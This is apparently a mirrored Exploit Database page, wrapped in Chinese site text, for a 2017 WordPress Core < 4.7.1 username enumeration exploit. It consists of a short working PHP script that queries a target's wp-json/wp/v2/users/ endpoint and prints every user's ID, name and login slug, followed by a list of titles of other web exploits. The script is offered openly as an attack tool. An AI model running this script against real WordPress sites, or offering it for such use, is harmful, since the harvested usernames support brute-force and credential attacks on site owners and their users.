WordPress Core < 4.7.1 - Username Enumeration

Exploit Database
34 阅读

作者： Dctor

日期： 2017-03-03
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/41497/

#!usr/bin/php
<?php

#Author: Mateus a.k.a Dctor
#fb: fb.com/hatbashbr/
#E-mail: dctoralves@protonmail.ch
#Site: https://mateuslino.tk 
header ('Content-type: text/html; charset=UTF-8');


$url= "http://localhost/";
$payload="wp-json/wp/v2/users/";
$urli = file_get_contents($url.$payload);
$json = json_decode($urli, true);
if($json){
	echo "*-----------------------------*\n";
foreach($json as $users){
	echo "[*] ID :|" .$users['id'] ."|\n";
	echo "[*] Name: |" .$users['name'] ."|\n";
	echo "[*] User :|" .$users['slug'] ."|\n";
	echo "\n";
}echo "*-----------------------------*";} 
else{echo "[*] No user";}


?>

last Exploits
WordPress Core < 4.7.1 - Username Enumeration的更多信息

Dicoogle PACS 2.5.0 – Directory Traversal：
DB[CMS] – ‘article.php’ SQL Injection：
Ingenious School Management System 2.3.0 – ‘friend_index’ SQL injection：
Free Blog 1.0 – Multiple Vulnerabilities：
Ero Auktion 2010 – ‘news.php’ SQL Injection：
Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c – Remote Command Execution：
Allomani Web Links 1.0 – Cross-Site Request Forgery (Add Admin)：
S9Y Serendipity 1.6.2 – ‘serendipity_admin_image_selector.php’ Cross-Site Scripting：